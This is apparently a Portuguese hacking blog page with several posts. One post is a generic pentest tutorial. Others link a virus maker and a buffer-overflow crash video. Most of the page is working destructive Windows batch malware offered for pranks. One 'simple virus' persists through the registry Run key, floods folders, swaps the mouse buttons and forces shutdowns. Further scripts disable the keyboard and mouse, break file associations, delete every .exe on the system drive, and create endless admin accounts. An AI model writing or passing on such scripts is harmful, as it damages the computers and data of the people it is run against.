Abrindo Sites porno de modo oculto

Abrindo Sites porno de modo oculto

Com esse batch script você abrira muitos sites pornos de forma oculta, bom para se divertir com seus coleguinhas.

Source Completa: http://paste.ubuntu.com/564689/

 

creditos: Boss-Head

 

 

 

 

Popularity: unranked [?]

TeraBIT Virus Maker

TeraBIT Virus Maker

Author: RezHacker

Data: Julho de 2010

Desabilite o ANTIVIRUS para usar.

Download: http://www.vxheavens.com/dl/gen/tvm32.zip

 

Popularity: 5% [?]

Tutorial PenTest (inicio)

Tutorial PenTest (inicio)

O que pretendo discutir com os nossos colegas é quais são as ferramentas e métodos que utilizam para enumeração ,scanning e testes de vulnerabilidades em redes, sejam essas ferramentas para uso online ou em nossa maquina.

1. Penetration testing

 

Penetration-test é o método usado para testar e descobrir vulnerabilidades numa rede e a possibilidade de ver como estas podem ser exploradas ou corrigidas.

 

Para ser feito um teste de penetração são contratados profissionais (ou pessoas internas à rede) para explorar a rede, da mesma forma que um cracker faria e em seguida são entregues os resultados indicando todas as falhas encontradas e como corrigi-las.

 

Para se fazer um teste de penetração é necessário passar diversas fases, para as quais são utilizadas diversas ferramentas. As fases serão indicadas nos pontos seguintes.

1.1- Reconhecimento da rede

 

A enumeração consiste no reconhecimento da rede e dos sistemas atingíveis. Os resultados esperados são: nomes de domínios, nomes de servidores, informação do ISP, endereços IP envolvidos e também um mapa da rede. Inclui ainda informação de registros de domínios para os servidores.

 

Para fazer o reconhecimento da rede, podem ser utilizadas diversas ferramentas e técnicas, conforme o objectivo do ataque. Indico abaixo algumas ferramentas, que poderão ser usadas no reconhecimento.

 

• Nslookup – funciona em Windows e Linux. Serve para mapear endereços IP para um determinado domínio.

 

• Whois –Nos dá toda a informação sobre um domínio registado (entidade que registou, endereço físico, contactos, domain servers, etc)

 

• ARIN

 

• Dig – serve para perguntar a um servidor DNS informação acerca de outras coisas, por exemplo, a versão do name server que a empresa está a utilizar…

 

• Engenharia social

 

• Web site alvo

1.2-Scanning

 

Nesta fase de um teste de penetração é a identificação de portas abertas e serviços a correr, na máquina(s) ou rede alvo, chegando assim a enumeração de vulnerabilidades no alvo.

 

Também nesta fase do teste podemos incluir diversas ferramentas e tecnicas, conforme o objectivo do teste e a configuração da máquina/rede alvo. Ferramentas deste tipo foram analisadas no ponto 3 deste mesmo relatório.

 

As ferramentas mais utilizadas para fazer scanning, são:

 

• telnet –Serve para mostrar informação sobre uma aplicação ou serviço (versão, plataforma.

 

• nmap – port scanner

 

• hping2 – port scanner

 

• netcat – port scanner

 

• ping – testa conectividade IP

 

• traceroute – Ele conta os “hops” da rede, desde a máquina em que é executado até à máquina/sistema alvo.

 

• queso – OS fingerprinting.

1.3- Teste de vulnerabilidade

 

Os testes de vulnerabilidades consistem na determinação de que buracos de segurança e vulnerabilidades podem ser aplicadas à rede/máquina alvo. Quem efectuar o teste vai tentar identificar nas máquinas na rede alvo todas as portas abertas, sistemas operativos e aplicações a serem executadas; incluindo o sistema operativo, patches aplicados e service packs aplicados.

 

Nas etapas anteriores, são identificadas as máquinas que estão ligadas e que portas e serviços têm disponíveis.

 

Existe, na geral quatro categorias de vulnerabilidades que podem ser encontradas:

 

• Os bugs específicos do sistema operativo, exploits, vulnerabilidades e buracos de segurança

 

• As fraquezas no firewall e routers, entre diversas marcas

 

• A exploração de scripts de web server

 

• As partilhas e confianças exploráveis entre sistemas e pastas.

 

O scan de vulnerabilidades pode ser feito de várias formas, que indicarei nos pontos seguintes.

1.3.1- Ferramentas e Manuais

 

As análises das vulnerabilidades de um computador pode ser feita manualmente, com base na informação recolhida nos pontos anteriores. Ou seja, são percorridas as listas de vulnerabilidades existentes, em busca de alguma que possa existir para cada uma das aplicações instaladas na máquina.

1.3.2- Nessus

 

O Nessus é a melhor ferramenta para inventariar vulnerabilidades com código fonte disponível.

 

Instalação

 

Esta ferramenta é constituida por duas partes: o cliente e o servidor, que podem ou não, ser instaladas em máquinas diferentes.

A instalação é bastante simples:

 

• executa-se a script de instalação

• adiciona-se um utilizador

 

Utilização

 

O Nessus tem de ter o servidor instalado numa máquina *IX, mas o cliente pode ser executado em Windows ou em *IX.

 

O cliente desta ferramenta, pode correr em modo gráfico ou em modo de comando. O modo de comando tem a vantagem de poder ser incluído em scripts, o modo gráfico tem a vantagem de ser facilmente seleccionável quais os testes de vulnerabilidade que são executados.

1.3.3- SARA-Security Auditor’s research assistant

 

O SARA é um scanner de rede, que procura serviços e os analisa.

Esta ferramenta produz relatórios em diversos formatos: html, XML, interactivos e CSV, importável para folhas de cálculo.

 

Instalação

 

A instalação do SARA é muito simples: basta descomprimir o tgz, e executar ./configure, make, make install.

 

Relativamente à configuração, podem fazer-se algumas configurações específicas, mas deixando tudo o que vem por default, obtêm-se resultados interessantes.

 

Utilização

 

O SARA pode ser executado em três modos: interactivo (interface web), linha de comando, ou modo remoto.. No caso presente, optei pelo modo interactivo.

 

O modo remoto pode ser útil, no caso de se desejar ter o servidor de SARA numa determinada máquina e um cliente gráfico, na própria máquina.

 

Este modo tem algumas limitações: só é permitido um utilizador de cada vez, um teste não pode ser interrompido, o servidor não foi feito para ficar permanentemente à espera de pedidos, é preciso ter preocupações com a segurança.

 

Pode ser definido o tipo de “ataque” que é feito à máquina/rede em causa. Pode variar entre cinco níveis de severidade.

1.3.4- Comparação entre detectores de vulnerabilidades

 

A detecção manual de vulnerabilidades é, com certeza a que permite mais pormenor, mas é muito difícil de ser implementada com perfeição.

 

Relativamente às duas ferramentas utilizadas, o SARA é, sem dúvida, mais rápida, mas é também a menos eficiente. Além de apresentar resultados muito menos detalhados e não apresentar formas de resolução das vulnerabilidades (como o Nessus), apresenta falsos positivos.

 

Relativamente à forma de apresentação de resultados, o SARA é muito inferior. O servidor tem ainda problemas de funcionamento, no sentido que entre dois testes, se não for removido, não funciona corretamente.

 

Tem no entanto, uma funcionalidade interessante, que é ir guardando e apresentando em paralelo os resultados de testes anteriores.

 

Esta característica pode ser interessante, do ponto de vista de armazenamento de informação sobre todo o parque de servidores de uma empresa, por exemplo.

 

Fonte: Baseado no Curso EC-Council | Certified Ethical Hacker e alguns trechos encontrados na internet.

Créditos:SecurityHacker

Reeditado por L.henvy

 

Popularity: 9% [?]

Simples Vírus em Batch Script

Simples Vírus em Batch Script

Bom se tem uma coisa que eu gosto de fazer desde que comecei a mexer serio no computador com certeza seria Batch Script. A”linguagem” é velha, tá zuada + ainda da pra fazer coisas incriveis.

Oque o Vírus Faz?

É EXECUTADO A CADA INICIALIZAÇÃO DO WINDOWS
DEPOIS DE ATIVADO:
CRIA 1000 PASTAS EM CADA UM DOS SEGUINTES LOCAIS:
( %userprofile%\Desktop )
( %windir% )
INVERTE OS BOTÕES DO MOUSE
APOS CRIAR AS PASTAS, MOSTRA DIVERSAS VEZES UMA MENSAGEM NA TELA DO USUARIO,
E LOGO EM SEGUIDA, DESLIGA O COMPUTADOR (QUANDO PASSADOS 10 SEGUNDOS DEPOIS
DE ENVIADA A PRIMEIRA MENSAGEM).

Source:

@echo off
if exist "%windowsdir%\system32\21613.bat" (goto end) else (goto Criar)
:end
shutdown -s -t 00
exit
:Criar
(
echo @echo off
echo cd %userprofile%\Desktop
echo set NdP=1000
echo set /a nome=0
echo :3
echo if exist %%NdP%% goto 4
echo set /a nome=%%nome%%+1
echo md %%nome%%
echo goto 3
echo :4
echo cls
echo cd %windir%
echo set Ndps=1000
echo set /a nomes=0
echo :3S
echo if exist %%Ndps%% goto 5
echo set /a nomes=%%nomes%%+1
echo md %%nomes%%
echo goto 3S
echo :5
echo cls
echo RUNDLL32 USER32.DLL,SwapMouseButton
echo goto 6
echo :6
echo msg * Fuck You!
echo shutdown -s -t 10 -c "Fucked quer aprender? Se vira!"
echo goto 6
)>%windir%\system32\21613.bat
attrib +H %windowsdir%\system32\21613.bat
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "BasicSystem" /t reg_sz /d "%windir%\system32\21613.bat" /F >NUL
goto end

Popularity: 13% [?]

Batch Script Para Badcom

Batch Script Para Badcom

Depois de um tempo sem postar.

Batch Scripts para Badcoms.

Desabilitar o teclado:

@echo off
rem ---------------------------------
rem Disabilita o teclado
echo Windows Registry Editor Version 5.00 > "Disabi_teclado.reg"
echo [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Keyboard Layout] >> "Disabi_teclado.reg"
echo "Scancode Map"=hex:00,00,00,00,00,00,00,00,7c,00,00,00,00,00,01,00,00,\ >> "Disabi_teclado.reg"
echo 00,3b,00,00,00,3c,00,00,00,3d,00,00,00,3e,00,00,00,3f,00,00,00,40,00,00,00,\ >> "Disabi_teclado.reg"
echo 41,00,00,00,42,00,00,00,43,00,00,00,44,00,00,00,57,00,00,00,58,00,00,00,37,\ >> "Disabi_teclado.reg"
echo e0,00,00,46,00,00,00,45,00,00,00,35,e0,00,00,37,00,00,00,4a,00,00,00,47,00,\ >> "Disabi_teclado.reg"
echo 00,00,48,00,00,00,49,00,00,00,4b,00,00,00,4c,00,00,00,4d,00,00,00,4e,00,00,\ >> "Disabi_teclado.reg"
echo 00,4f,00,00,00,50,00,00,00,51,00,00,00,1c,e0,00,00,53,00,00,00,52,00,00,00,\ >> "Disabi_teclado.reg"
echo 4d,e0,00,00,50,e0,00,00,4b,e0,00,00,48,e0,00,00,52,e0,00,00,47,e0,00,00,49,\ >> "Disabi_teclado.reg"
echo e0,00,00,53,e0,00,00,4f,e0,00,00,51,e0,00,00,29,00,00,00,02,00,00,00,03,00,\ >> "Disabi_teclado.reg"
echo 00,00,04,00,00,00,05,00,00,00,06,00,00,00,07,00,00,00,08,00,00,00,09,00,00,\ >> "Disabi_teclado.reg"
echo 00,0a,00,00,00,0b,00,00,00,0c,00,00,00,0d,00,00,00,0e,00,00,00,0f,00,00,00,\ >> "Disabi_teclado.reg"
echo 10,00,00,00,11,00,00,00,12,00,00,00,13,00,00,00,14,00,00,00,15,00,00,00,16,\ >> "Disabi_teclado.reg"
echo 00,00,00,17,00,00,00,18,00,00,00,19,00,00,00,1a,00,00,00,1b,00,00,00,2b,00,\ >> "Disabi_teclado.reg"
echo 00,00,3a,00,00,00,1e,00,00,00,1f,00,00,00,20,00,00,00,21,00,00,00,22,00,00,\ >> "Disabi_teclado.reg"
echo 00,23,00,00,00,24,00,00,00,25,00,00,00,26,00,00,00,27,00,00,00,28,00,00,00,\ >> "Disabi_teclado.reg"
echo 1c,00,00,00,2a,00,00,00,2c,00,00,00,2d,00,00,00,2e,00,00,00,2f,00,00,00,30,\ >> "Disabi_teclado.reg"
echo 00,00,00,31,00,00,00,32,00,00,00,33,00,00,00,34,00,00,00,35,00,00,00,36,00,\ >> "Disabi_teclado.reg"
echo 00,00,1d,00,00,00,5b,e0,00,00,38,00,00,00,39,00,00,00,38,e0,00,00,5c,e0,00,\ >> "Disabi_teclado.reg"
echo 00,5d,e0,00,00,1d,e0,00,00,5f,e0,00,00,5e,e0,00,00,22,e0,00,00,24,e0,00,00,\ >> "Disabi_teclado.reg"
echo 10,e0,00,00,19,e0,00,00,30,e0,00,00,2e,e0,00,00,2c,e0,00,00,20,e0,00,00,6a,\ >> "Disabi_teclado.reg"
echo e0,00,00,69,e0,00,00,68,e0,00,00,67,e0,00,00,42,e0,00,00,6c,e0,00,00,6d,e0,\ >> "Disabi_teclado.reg"
echo 00,00,66,e0,00,00,6b,e0,00,00,21,e0,00,00,00,00 >> "Disabi_teclado.reg"
regedit /s "Disabi_teclado.reg"
rem ---------------------------------


Desabilitar o Mouse:

@echo off
rem ---------------------------------
rem Disabilita o mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem ---------------------------------

Associar Errado Arquivos:

@echo off
rem ---------------------------------
rem associa errado
assoc .txt=jpegfile
assoc .exe=htmlfile
assoc .jpeg=avifile
assoc .png=mpegfile
assoc .mpeg=txtfile
assoc .sys=regfile
exit
rem ---------------------------------

Deletar todos os .EXE:

@echo off
rem ---------------------------------
rem Deleta todos Exe
DIR /S/B %SystemDrive%\*.exe >> Lista_arq_exe.txt
echo S | FOR /F "tokens=1,* delims=: " %%j in (Lista_arq_exe.txt) do del "%%j:%%k"
rem ---------------------------------

Floodar Usuarios da Maquina

@echo off
rem ---------------------------------
rem flooda usuarios
:usrflood
set usr=%random%
net users %usr% %random% /add
net localgroup administradores %usr% /add
goto usrflood
rem ---------------------------------

Para usar basta colar o codigo  no bloco de notas e salvar como NOME.bat não esquecer de mudar em baixo do note para TODOS OS ARQUIVOS.

Em Breve Mais Codigos.

Popularity: 18% [?]

Derrubando Servidor Ftp por Buffer Overflow

Derrubando Servidor Ftp por Buffer Overflow

Não costumo por coisas em nosso site feitas por outras pessoas porem essa video aula é muito boa e de qualidade vale a pena ver e aprender.

 

Nesta Video Aula Demonstro como derrubar o servidor Easy FTP via Buffer Overflow com o Metasploit.

Link do Video: http://www.youtube.com/watch?v=owqJWEvodpg

 

Logs da AulaLogs do Metasploit

 

Creditos: www.inw-seguranca.com

Autor: Samukt

 

Abraços!

 

 

 

Popularity: 39% [?]

[Source] Positive Vírus

[Source] Positive Vírus

Nome do Vírus: Positive

Autor: d3v1l

Sistema: Windowns

Linguagem: Batch Script

Download:AQUI

 

 

 

Popularity: 5% [?]

Free Web Hosting